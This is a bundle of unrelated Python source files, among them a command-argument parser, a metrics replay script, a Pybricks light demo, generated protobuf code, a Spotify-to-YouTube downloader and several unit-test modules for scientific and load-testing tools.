for index, prefix in enumerate(find_prefix):
if prefix is not True:
continue
return self.prefix[index]
elif not isinstance(self.prefix, (tuple, list)):
return self.prefix
return None
async def parse_arguments(self) -> Tuple[Dict, List]:
"""
Parse the arguments.
Returns:
The arguments and the keyword-arguments.
"""
keyword_arguments: Dict = {}
arguments: List = []
if self.command is not None:
signature = inspect.signature(self.command.callback)
for index, (argument, parameter) in enumerate(signature.parameters.items()):
if index == 0:
continue
if index == 1 and self.command.parent is not None:
continue
if parameter.kind is parameter.POSITIONAL_OR_KEYWORD:
arguments.append(await self.convert(parameter, self.arguments[index - 1]))
elif parameter.kind is parameter.KEYWORD_ONLY:
keyword_arguments[argument] = await self.convert(parameter, " ".join(self.arguments[index - 1 :]))
return keyword_arguments, arguments
async def convert(self, parameter: inspect.Parameter, data: str) -> Any:
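        """
        Convert a raw string argument: use a registered converter for the annotation if
        one exists, otherwise call the annotation itself if callable, else return str(data).
        """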
name = parameter.annotation.removeprefix("lefi.")
if converter := _CONVERTERS.get(name):
return await converter.convert(self.context, data)
if parameter.annotation is not parameter.empty and callable(parameter.annotation):
return parameter.annotation(data)
return str(data)
@property
def invoker(self) -> Optional[Command]:
"""
Get the invoker.
Returns:
The invoker [Command](./command.md).
"""
return self.command
@property
def invoked_with(self) -> Optional[str]:
"""
The prefix the command was invoked with.
Returns:
The prefix.
"""
return self.parse_prefix()
|
py | 1a330397a0cfe4cfbaa69fdecaf8077c35af44e7 | import sys
sys.path.insert(0, "/home/nutanix/ncc/bin")
import env
import util.ncc.plugins.consts as consts
import util.ncc.config_module.config as config
from util.ncc.data_access.data_interface import *
from util.ncc.config_module.config import *
from util.ncc.ncc_utils.globals import HealthServerGlobals
from serviceability.plugin_schema_pb2 import *
from google.protobuf import text_format
import datetime
import time
import math
import copy
import os
import json
hglobals = HealthServerGlobals()
idf = hglobals.get_insights_da()
options = {"create_entity" : True}
print "begin writing capacity data"
current_time = int(round(time.time()))
april_25 = "04/25/2019"
time_delta = int(round(time.time()) - time.mktime(datetime.datetime.strptime(april_25, "%m/%d/%Y").timetuple()))
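# time_delta (seconds) is later added to every sample timestamp (in microseconds) so the
# replayed historical data lines up with the current time when written to IDF.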
all_files = {}
for entity_type, _ , entity_files in os.walk(".", topdown=False):
if entity_type == "." or "xfit" in entity_type or "vm" in entity_type:
continue
entity_type = entity_type[2:]
all_files[entity_type] = entity_files
#print "all files", all_files
entity_types = ["cluster", "node", "container", "storage_pool"]
for entity_type in entity_types:
path = "entity_type"
completed_entity_ids = set()
for file in all_files[entity_type]:
ed_start_time = 1000000000000
ed_end_time = -1
ed_fields = []
entity_id = ""
#print "-------", file, "--" ,file.split("_attr.json")
if len(file.split("_attr.json")) == 2:
# print "----111---", file, "--" ,file.split("_attr.json")
entity_id = file.split("_attr.json")[0]
else:
# print "---222----", file, "--" ,file.split("_metrics.json")
entity_id = file.split("_metrics.json")[0]
if entity_id in completed_entity_ids:
continue
completed_entity_ids.add(entity_id)
#print "entity id", entity_id
if entity_type != "vm_small":
attribute_file = open(entity_type + "/" + entity_id + "_attr.json", "rb")
metric_file = open(entity_type + "/" + entity_id + "_metrics.json", "rb")
if entity_type != "vm_small":
#print "Creating", entity_type ," with entity id = ", entity_id
idf.register_entity(entity_type=entity_type, attribute_dict=json.loads(attribute_file.read()), entity_id=entity_id)
#print "Created", entity_type ,"with entity id = ", entity_id
#print "Adding metrics for ", entity_type," with entity id = ", entity_id
# print type(metric_file.read())
entity_data = EntityData()
entity_data.from_jsons(metric_file.read())
fd_list = entity_data.get_field_data_list(entity_id)
for fd in fd_list:
if entity_type =="vm" and ("lower" in fd.field_name or "upper" in fd.field_name):
continue
ed = EntityData()
fd.start_time_usec = fd.start_time_usec + (time_delta * 1000000)
fd.end_time_usec = fd.end_time_usec + (time_delta * 1000000)
ed_start_time = min(ed_start_time, fd.start_time_usec)
ed_end_time = max(ed_end_time, fd.end_time_usec)
ed_fields.append(fd.field_name)
entity_type_temp = entity_type
ed.append_field_data(entity_id, fd)
if entity_type == "vm_small":
entity_type_temp = "vm"
#print fd.values
last_good_value = -1
for i in range(len(fd.values)):
if i == 0:
continue
if fd.values[i] == -1:
fd.values[i] = last_good_value
if fd.values[i] != -1:
last_good_value = fd.values[i]
zeroes = 0
non_zeroes = 0
for x in fd.values:
if x==0:
zeroes = zeroes+1
else:
non_zeroes = non_zeroes+1
#print "num of zeroes =",zeroes," and num of non zeroes = ",non_zeroes," for ", fd.field_name, " of ",entity_id
time.sleep(0.5)
#print "Prepared entity data object for ", entity_type," with entity id = ", entity_id
idf.write(ed, entity_type_temp, entity_id, [fd.field_name], fd.start_time_usec/1000000, fd.end_time_usec/1000000, fd.sampling_interval_sec)
#print "Added metrics for ", entity_type," with entity id = ", entity_id," field_name= ",fd.field_name," and sampling interval = ",fd.sampling_interval_sec
#print "Prepared entity data object for ", entity_type," with entity id = ", entity_id
#idf.write(entity_data, entity_type, entity_id, ed_fields, ed_start_time, ed_end_time, sampling_interval)
#print "Added metrics for ", entity_type," with entity id = ", entity_id
|
py | 1a3303f3cbc6fea63965473a59bf4e0579674a02 | from .build import DATASET_REGISTRY, build_dataset # isort:skip
from .da import *
from .dg import *
from .ssl import *
|
py | 1a3303f7dce468f723159199d8e2e50752790f12 | from pybricks.hubs import CityHub
from pybricks.parameters import Color
from pybricks.tools import wait
from math import sin, pi
# Initialize the hub.
hub = CityHub()
# Make an animation with multiple colors.
hub.light.animate([Color.RED, Color.GREEN, Color.NONE], interval=500)
wait(10000)
# Make the color RED grow faint and bright using a sine pattern.
hub.light.animate(
[Color.RED * (0.5 * sin(i / 15 * pi) + 0.5) for i in range(30)], 40)
wait(10000)
# Cycle through a rainbow of colors.
hub.light.animate([Color(h=i*8) for i in range(45)], interval=40)
wait(10000)
|
py | 1a330534cd25d0e3eac3207ca8ff6e83bd39bb35 | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: object_detection/protos/post_processing.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='object_detection/protos/post_processing.proto',
package='object_detection.protos',
syntax='proto2',
serialized_options=None,
serialized_pb=_b('\n-object_detection/protos/post_processing.proto\x12\x17object_detection.protos\"\xbc\x01\n\x16\x42\x61tchNonMaxSuppression\x12\x1a\n\x0fscore_threshold\x18\x01 \x01(\x02:\x01\x30\x12\x1a\n\riou_threshold\x18\x02 \x01(\x02:\x03\x30.6\x12%\n\x18max_detections_per_class\x18\x03 \x01(\x05:\x03\x31\x30\x30\x12!\n\x14max_total_detections\x18\x05 \x01(\x05:\x03\x31\x30\x30\x12 \n\x11use_static_shapes\x18\x06 \x01(\x08:\x05\x66\x61lse\"\x91\x02\n\x0ePostProcessing\x12R\n\x19\x62\x61tch_non_max_suppression\x18\x01 \x01(\x0b\x32/.object_detection.protos.BatchNonMaxSuppression\x12Y\n\x0fscore_converter\x18\x02 \x01(\x0e\x32\x36.object_detection.protos.PostProcessing.ScoreConverter:\x08IDENTITY\x12\x16\n\x0blogit_scale\x18\x03 \x01(\x02:\x01\x31\"8\n\x0eScoreConverter\x12\x0c\n\x08IDENTITY\x10\x00\x12\x0b\n\x07SIGMOID\x10\x01\x12\x0b\n\x07SOFTMAX\x10\x02')
)
_POSTPROCESSING_SCORECONVERTER = _descriptor.EnumDescriptor(
name='ScoreConverter',
full_name='object_detection.protos.PostProcessing.ScoreConverter',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='IDENTITY', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SIGMOID', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SOFTMAX', index=2, number=2,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=483,
serialized_end=539,
)
_sym_db.RegisterEnumDescriptor(_POSTPROCESSING_SCORECONVERTER)
_BATCHNONMAXSUPPRESSION = _descriptor.Descriptor(
name='BatchNonMaxSuppression',
full_name='object_detection.protos.BatchNonMaxSuppression',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='score_threshold', full_name='object_detection.protos.BatchNonMaxSuppression.score_threshold', index=0,
number=1, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='iou_threshold', full_name='object_detection.protos.BatchNonMaxSuppression.iou_threshold', index=1,
number=2, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.6),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='max_detections_per_class', full_name='object_detection.protos.BatchNonMaxSuppression.max_detections_per_class', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=100,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='max_total_detections', full_name='object_detection.protos.BatchNonMaxSuppression.max_total_detections', index=3,
number=5, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=100,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='use_static_shapes', full_name='object_detection.protos.BatchNonMaxSuppression.use_static_shapes', index=4,
number=6, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=75,
serialized_end=263,
)
_POSTPROCESSING = _descriptor.Descriptor(
name='PostProcessing',
full_name='object_detection.protos.PostProcessing',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='batch_non_max_suppression', full_name='object_detection.protos.PostProcessing.batch_non_max_suppression', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='score_converter', full_name='object_detection.protos.PostProcessing.score_converter', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=True, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='logit_scale', full_name='object_detection.protos.PostProcessing.logit_scale', index=2,
number=3, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(1),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
_POSTPROCESSING_SCORECONVERTER,
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=266,
serialized_end=539,
)
_POSTPROCESSING.fields_by_name['batch_non_max_suppression'].message_type = _BATCHNONMAXSUPPRESSION
_POSTPROCESSING.fields_by_name['score_converter'].enum_type = _POSTPROCESSING_SCORECONVERTER
_POSTPROCESSING_SCORECONVERTER.containing_type = _POSTPROCESSING
DESCRIPTOR.message_types_by_name['BatchNonMaxSuppression'] = _BATCHNONMAXSUPPRESSION
DESCRIPTOR.message_types_by_name['PostProcessing'] = _POSTPROCESSING
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
BatchNonMaxSuppression = _reflection.GeneratedProtocolMessageType('BatchNonMaxSuppression', (_message.Message,), {
'DESCRIPTOR' : _BATCHNONMAXSUPPRESSION,
'__module__' : 'object_detection.protos.post_processing_pb2'
# @@protoc_insertion_point(class_scope:object_detection.protos.BatchNonMaxSuppression)
})
_sym_db.RegisterMessage(BatchNonMaxSuppression)
PostProcessing = _reflection.GeneratedProtocolMessageType('PostProcessing', (_message.Message,), {
'DESCRIPTOR' : _POSTPROCESSING,
'__module__' : 'object_detection.protos.post_processing_pb2'
# @@protoc_insertion_point(class_scope:object_detection.protos.PostProcessing)
})
_sym_db.RegisterMessage(PostProcessing)
# @@protoc_insertion_point(module_scope)
|
py | 1a3305ee37985617a33e7786a21adb820337f58f | import os
import pickle
from pathlib import Path
import pytest
import autofit as af
from autoconf.conf import output_path_for_test
from autofit.non_linear.paths.null import NullPaths
def test_null_paths():
search = af.DynestyStatic()
assert isinstance(
search.paths,
NullPaths
)
class TestPathDecorator:
@staticmethod
def assert_paths_as_expected(paths):
assert paths.name == "name"
assert paths.path_prefix == ""
def test_with_arguments(self):
search = af.MockSearch()
search.paths = af.DirectoryPaths(name="name")
self.assert_paths_as_expected(search.paths)
def test_positional(self):
search = af.MockSearch("name")
paths = search.paths
assert paths.name == "name"
def test_paths_argument(self):
search = af.MockSearch()
search.paths = af.DirectoryPaths(name="name")
self.assert_paths_as_expected(search.paths)
def test_combination_argument(self):
search = af.MockSearch("other", )
search.paths = af.DirectoryPaths(name="name")
self.assert_paths_as_expected(search.paths)
output_path = Path(
__file__
).parent / "path"
@pytest.fixture(
name="model"
)
def make_model():
return af.Model(
af.Gaussian
)
@output_path_for_test(
output_path
)
def test_identifier_file(model):
paths = af.DirectoryPaths()
paths.model = model
paths.search = af.DynestyStatic()
paths.save_all({}, {}, [])
assert os.path.exists(
output_path / paths.identifier / ".identifier"
)
def test_serialize(model):
paths = af.DirectoryPaths()
paths.model = model
pickled_paths = pickle.loads(
pickle.dumps(
paths
)
)
assert pickled_paths.model is not None
|
py | 1a33074e546bd156e003d301288d40c839243901 | import game
import pygame
from config import Config
class Main:
def __init__(self):
self.game_clock = pygame.time.Clock()
self.game = game.Game()
def mainloop(self):
while Config.BOOLEAN['game_loop']:
self.game.change_screen()
self.game_clock.tick(Config.CONSTANT['CLOCK'])
main = Main()
if __name__ == '__main__':
main.mainloop()
|
py | 1a33082880b7c05937b251b8bf35561afc78ab52 | """Unit tests for processor, focusing on multiple functions at a time."""
from pathlib import Path
import numpy as np
import pytest
from rimseval.processor import CRDFileProcessor
def test_integrals(crd_file):
"""Define an integral manually and calculate the integration."""
_, ions_per_shot, all_tofs, fname = crd_file
crd = CRDFileProcessor(Path(fname))
crd.spectrum_full()
# set some random mass cal from 1 to 2
crd.def_mcal = np.array([[crd.tof.min(), 1.0], [crd.tof.max(), 2.0]])
crd.mass_calibration()
# now set the integrals to include everything
crd.def_integrals = (["all"], np.array([[0.9, 2.1]])) # avoid floating errors
crd.integrals_calc()
assert len(all_tofs) == crd.integrals[0][0]
    assert np.sqrt(len(all_tofs)) == pytest.approx(crd.integrals[0][1])
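# Illustrative helper, not part of the original test module: the integral tests in
# this file assume Poisson counting statistics, i.e. an integral gathering N ions
# is expected to report a value of N with an uncertainty of sqrt(N).
def _expected_counts_and_uncertainty(ion_counts):
    """Return (sum, sqrt(sum)) for an array of per-shot ion counts."""
    total = np.sum(ion_counts)
    return total, np.sqrt(total)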
def test_integrals_bg_corr_behavior(crd_file):
"""Ensure that bg corrected integrals behave correctly."""
_, ions_per_shot, all_tofs, fname = crd_file
shots_per_pkg = 2
nof_pkgs = int(np.ceil(len(ions_per_shot) / shots_per_pkg))
integrals_exp = np.zeros((nof_pkgs, 1, 2)) # 1 integral
start_ind = 0
for it in range(nof_pkgs - 1):
stop_ind = start_ind + shots_per_pkg
integrals_exp[it][0][0] = np.sum(ions_per_shot[start_ind:stop_ind])
integrals_exp[it][0][1] = np.sqrt(integrals_exp[it][0][0])
start_ind = stop_ind
# add the last
integrals_exp[-1][0][0] = np.sum(ions_per_shot[start_ind:])
integrals_exp[-1][0][1] = np.sqrt(integrals_exp[-1][0][0])
crd = CRDFileProcessor(Path(fname))
crd.spectrum_full()
crd.packages(shots_per_pkg)
# set some random mass cal from 1 to 2
crd.def_mcal = np.array([[crd.tof.min(), 1.0], [crd.tof.max(), 2.0]])
crd.mass_calibration()
# now set the integrals to include everything
crd.def_integrals = (["all"], np.array([[0.9, 2.1]])) # avoid floating errors
crd.integrals_calc()
integrals_only = np.array(crd.integrals)
integrals_pkg_only = np.array(crd.integrals_pkg)
# set the background correction
crd.def_backgrounds = (["all"], np.array([[0.1, 0.9]]))
crd.integrals_calc()
# now make sure that integrals are always smaller when bg corrected than when not
assert all(crd.integrals[:, 0] <= integrals_only[:, 0])
assert all(crd.integrals[:, 1] >= integrals_only[:, 1])
# sum of packaged integrals is still equal to sum of integrals
np.testing.assert_allclose(crd.integrals_pkg.sum(axis=0)[:, 0], crd.integrals[:, 0])
def test_integrals_pkg(crd_file):
"""Define an integral manually and calculate the integration for packages."""
_, ions_per_shot, all_tofs, fname = crd_file
shots_per_pkg = 2
nof_pkgs = int(np.ceil(len(ions_per_shot) / shots_per_pkg))
integrals_exp = np.zeros((nof_pkgs, 1, 2)) # 1 integral
start_ind = 0
for it in range(nof_pkgs - 1):
stop_ind = start_ind + shots_per_pkg
integrals_exp[it][0][0] = np.sum(ions_per_shot[start_ind:stop_ind])
integrals_exp[it][0][1] = np.sqrt(integrals_exp[it][0][0])
start_ind = stop_ind
# add the last
integrals_exp[-1][0][0] = np.sum(ions_per_shot[start_ind:])
integrals_exp[-1][0][1] = np.sqrt(integrals_exp[-1][0][0])
crd = CRDFileProcessor(Path(fname))
crd.spectrum_full()
crd.packages(shots_per_pkg)
# set some random mass cal from 1 to 2
crd.def_mcal = np.array([[crd.tof.min(), 1.0], [crd.tof.max(), 2.0]])
crd.mass_calibration()
# now set the integrals to include everything
crd.def_integrals = (["all"], np.array([[0.9, 2.1]])) # avoid floating errors
crd.integrals_calc()
np.testing.assert_almost_equal(crd.integrals_pkg, integrals_exp)
# check that sum agrees -> sqrt of sqsum for uncertainty
crd_integrals_sum = np.array(crd.integrals_pkg)
crd_integrals_sum[:, :, 1] = crd_integrals_sum[:, :, 1] ** 2
crd_integrals_sum = crd_integrals_sum.sum(axis=0)
crd_integrals_sum[:, 1] = np.sqrt(crd_integrals_sum[:, 1])
np.testing.assert_almost_equal(crd.integrals, crd_integrals_sum)
def test_integrals_pkg_with_filtering(crd_file):
"""Filtering in packages and get the sum of the integrals."""
_, _, _, fname = crd_file
shots_per_pkg = 1
max_ions_per_shot = 1
crd = CRDFileProcessor(Path(fname))
crd.spectrum_full()
crd.packages(shots_per_pkg)
    crd.filter_max_ions_per_pkg(max_ions_per_shot)
# set some random mass cal from 1 to 2
crd.def_mcal = np.array([[crd.tof.min(), 1.0], [crd.tof.max(), 2.0]])
crd.mass_calibration()
# now set the integrals to include everything
crd.def_integrals = (["all"], np.array([[0.9, 2.1]])) # avoid floating errors
crd.integrals_calc()
# check that sum agrees -> sqrt of sqsum for uncertainty
crd_integrals_sum = np.array(crd.integrals_pkg)
crd_integrals_sum[:, :, 1] = crd_integrals_sum[:, :, 1] ** 2
crd_integrals_sum = crd_integrals_sum.sum(axis=0)
crd_integrals_sum[:, 1] = np.sqrt(crd_integrals_sum[:, 1])
np.testing.assert_almost_equal(crd.integrals, crd_integrals_sum)
|
py | 1a3308ca4c2bf4b31d0fb989ba0b54618439e4d6 | from __future__ import unicode_literals
import re
import os
import spotipy.util as util
import youtube_dl
from spotify_dl.scaffold import *
def authenticate():
"""Authenticates you to Spotify
"""
scope = 'user-library-read'
username = ''
return util.prompt_for_user_token(username, scope)
def fetch_tracks(sp, playlist, user_id):
"""Fetches tracks from Spotify user's saved
    tracks or from a playlist (if the playlist parameter is passed)
    and saves song name and artist name to the songs dict
"""
log.debug('Fetching saved tracks')
offset = 0
songs_dict = {}
if user_id is None:
current_user_id = sp.current_user()['id']
else:
current_user_id = user_id
while True:
if playlist is None:
results = sp.current_user_saved_tracks(limit=50, offset=offset)
else:
results = sp.user_playlist_tracks(current_user_id, playlist, None,
limit=50, offset=offset)
log.debug('Got result json %s', results)
for item in results['items']:
track = item['track']
if track is not None:
track_name = str(track['name'])
track_artist = str(track['artists'][0]['name'])
                log.debug('Appending %s to '
'songs list', (track['name'] + ' - ' + track['artists'][0]['name']))
songs_dict.update({track_name: track_artist})
else:
log.warning("Track/artist name for %s not found, skipping", track)
offset += 1
if results.get('next') is None:
log.info('All pages fetched, time to leave.'
' Added %s songs in total', offset)
break
return songs_dict
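# Illustrative usage sketch, not part of the original module; the spotipy client
# construction below is an assumption about how callers wire this together:
#
#   import spotipy
#   sp = spotipy.Spotify(auth=authenticate())
#   songs = fetch_tracks(sp, playlist=None, user_id=None)  # user's saved tracks
#   # songs maps track name -> artist name, e.g. {'Some Track': 'Some Artist'}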
def save_songs_to_file(songs, directory):
"""
:param songs
Saves the songs fetched from fetch_tracks function to songs.txt file
to be downloaded from youtube-dl
"""
with open(os.path.join(directory, 'songs.txt'), 'w', encoding="utf-8") as f:
f.write(' '.join(str(songs)))
f.close()
def download_songs(info, download_directory, format_string, skip_mp3):
"""
Downloads songs from the YouTube URL passed to either
    current directory or download_directory, if it is passed
"""
for item in info:
log.debug('Songs to download: %s', item)
url_, track_, artist_ = item
download_archive = download_directory + 'downloaded_songs.txt'
outtmpl = download_directory + '%(title)s.%(ext)s'
ydl_opts = {
'format': format_string,
'download_archive': download_archive,
'outtmpl': outtmpl,
'noplaylist': True,
'postprocessor_args': ['-metadata', 'title=' + str(track_),
'-metadata', 'artist=' + str(artist_)],
}
if not skip_mp3:
mp3_postprocess_opts = {
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '192',
}
ydl_opts['postprocessors'] = [mp3_postprocess_opts.copy()]
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
try:
log.debug(ydl.download([url_]))
except Exception as e:
log.debug(e)
print('Failed to download: {}'.format(url_))
continue
def extract_user_and_playlist_from_uri(uri, sp):
playlist_re = re.compile("(spotify)(:user:[\w,.]+)?(:playlist:[\w]+)")
user_id = sp.current_user()['id']
for playlist_uri in ["".join(x) for x in playlist_re.findall(uri)]:
segments = playlist_uri.split(":")
if len(segments) >= 4:
user_id = segments[2]
playlist_id = segments[4]
log.info('List ID: ' + str(playlist_id))
else:
playlist_id = segments[2]
log.info('List ID: ' + str(playlist_id))
log.info('List owner: ' + str(user_id))
return user_id, playlist_id
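# Example of the URI shapes the regex above accepts (illustrative IDs):
#   "spotify:user:someuser:playlist:37i9dQZF1DXcBWIGoYBM5M" -> ("someuser", "37i9dQZF1DXcBWIGoYBM5M")
#   "spotify:playlist:37i9dQZF1DXcBWIGoYBM5M"               -> (current user's id, "37i9dQZF1DXcBWIGoYBM5M")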
def playlist_name(uri, sp):
user_id, playlist_id = extract_user_and_playlist_from_uri(uri, sp)
return get_playlist_name_from_id(playlist_id, user_id, sp)
def get_playlist_name_from_id(playlist_id, user_id, sp):
playlist = sp.user_playlist(user_id, playlist_id,
fields="tracks, next, name")
name = playlist['name']
return name
|
py | 1a330928b8cfc8b23c6163384f49d5a9059ac696 | from slideshow import SlideShow
def test_init_title(mocker):
"""Test init function sets title value"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
slideshow = SlideShow("ZlNLpWJUv52wgu2Y", stub)
slideshow.root.title.assert_called_once_with("ZlNLpWJUv52wgu2Y")
def test_init_callback(mocker):
"""Test init function sets callback"""
stub = mocker.stub()
slideshow = SlideShow("", stub)
assert slideshow.start_callback == stub
def test_init_geometry(mocker):
"""Test init function sets geometry values"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
slideshow = SlideShow("", stub, 500, 600)
slideshow.root.geometry.assert_called_once_with("500x600+0+0")
def test_show(mocker):
"""Test show function calls Tk.mainloop()"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
slideshow = SlideShow("", stub)
slideshow.show()
slideshow.root.mainloop.assert_called_once_with()
def test_toggle_start_active(mocker):
"""Test toggle_start sets active value"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
slideshow = SlideShow("", stub)
assert slideshow.is_active() is False
slideshow.toggle_start()
assert slideshow.is_active() is True
def test_toggle_start_callback(mocker):
"""Test toggle_start calls the callback function"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
slideshow = SlideShow("", stub)
slideshow.toggle_start()
stub.assert_called_once_with()
def test_toggle_start_buttontext(mocker):
"""Test toggle_start changes the button text"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
mocker.patch("tkinter.Button")
slideshow = SlideShow("", stub)
slideshow.toggle_start()
slideshow.startstop_button.config.assert_called_once_with(text="Stop")
slideshow.toggle_start()
slideshow.startstop_button.config.assert_called_with(text="Start")
def test_update_progress(mocker):
"""Test update_progress sets expected value"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
mocker.patch("tkinter.Label")
slideshow = SlideShow("", stub)
slideshow.update_progress(500, 600, "gx8oN6ZDHc3lv3xy")
slideshow.progress_label.config.assert_called_once_with(text="500 (83.33%): gx8oN6ZDHc3lv3xy")
|
py | 1a33097aeaf793f10935290949ba1a0550f827a2 | import os
import re
import shutil
import yaml
from io import BytesIO
import bzt
from bzt import ToolError, TaurusConfigError
from bzt.engine import EXEC
from bzt.modules._apiritif import ApiritifNoseExecutor
from bzt.modules.functional import LoadSamplesReader, FuncSamplesReader
from bzt.modules.provisioning import Local
from bzt.modules._selenium import SeleniumExecutor
from bzt.utils import LDJSONReader, FileReader
from tests.unit import BZTestCase, RESOURCES_DIR, ROOT_LOGGER, EngineEmul
from tests.unit.mocks import DummyListener
from tests.unit.modules._selenium import SeleniumTestCase, MockPythonTool
class LDJSONReaderEmul(object):
def __init__(self):
self.data = []
def read(self, last_pass=False):
for line in self.data:
yield line
class TestSeleniumExecutor(SeleniumTestCase):
# todo: get_error_diagnostics: only geckodriver, not chrome-?
def setUp(self):
super(TestSeleniumExecutor, self).setUp()
self.CMD_LINE = ''
def start_subprocess(self, args, **kwargs):
self.CMD_LINE = " ".join(args)
def obj_prepare(self):
tmp_tool = bzt.modules._apiritif.executor.Apiritif
try:
bzt.modules._apiritif.executor.Apiritif = MockPythonTool
bzt.modules._selenium.Selenium.version = "3"
self.obj.prepare()
finally:
bzt.modules._apiritif.executor.Apiritif = tmp_tool
def test_data_source_in_action(self):
self.configure({
EXEC: {
"executor": "selenium",
"iterations": 1,
"scenario": {
"data-sources": [RESOURCES_DIR + "selenium/data-sources/data.csv"],
"requests": [{
"label": "exec_it",
"assert": ["Simple Travel Agency"],
"actions": ["go(${host}/${page})"]}]}}})
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
def test_user_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"iterations": 100,
"scenario": {
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = True
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertIn("--iterations 100", self.CMD_LINE)
def test_load_no_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"scenario": {
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = False
self.obj.engine.start_subprocess = self.start_subprocess
self.obj_prepare()
self.obj.startup()
self.obj.post_process()
self.assertIn("--iterations 1", self.CMD_LINE)
def test_load_no_iter_duration(self):
self.configure({
EXEC: {
"executor": "apiritif",
"hold-for": "2s",
"scenario": {
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = False
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertNotIn("--iterations", self.CMD_LINE)
def test_func_no_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"scenario": {
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = True
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertIn("--iterations 1", self.CMD_LINE)
def test_func_0_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"iterations": 0,
"scenario": {
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = True
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertNotIn('--iterations', self.CMD_LINE)
def test_func_ds_0_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"iterations": 0,
"scenario": {
"data-sources": ['one.csv'],
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = True
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertNotIn('--iterations', self.CMD_LINE)
def test_func_ds_no_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"scenario": {
"data-sources": ['one.csv'],
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = True
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertNotIn('--iterations', self.CMD_LINE)
class TestSeleniumStuff(SeleniumTestCase):
def start_subprocess(self, args, **kwargs):
self.CMD_LINE = args
def obj_prepare(self):
tmp_tool = bzt.modules._apiritif.executor.Apiritif
try:
bzt.modules._apiritif.executor.Apiritif = MockPythonTool
bzt.modules._selenium.Selenium.version = "3"
self.obj.prepare()
finally:
bzt.modules._apiritif.executor.Apiritif = tmp_tool
def obj_prepare_runner(self):
super(SeleniumExecutor, self.obj).prepare()
